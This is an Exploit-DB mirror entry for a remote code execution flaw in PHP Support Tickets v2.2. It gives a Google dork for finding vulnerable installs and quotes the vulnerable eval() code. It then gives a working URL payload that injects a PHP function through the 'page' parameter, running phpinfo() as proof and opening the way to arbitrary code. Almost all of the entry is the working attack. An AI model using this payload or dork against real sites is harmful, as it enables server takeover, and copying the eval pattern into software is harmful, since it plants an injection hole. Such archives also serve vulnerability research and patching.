exploit-db-mirror/exploits/php/webapps/17822.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

20 lines
No EOL
608 B
Text

# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2
====================================================================
# Vuln. code:
/classes/GUI/abstract.GUI.php
public function getPageName() {
return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
}
====================================================================
# Exploit:
/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}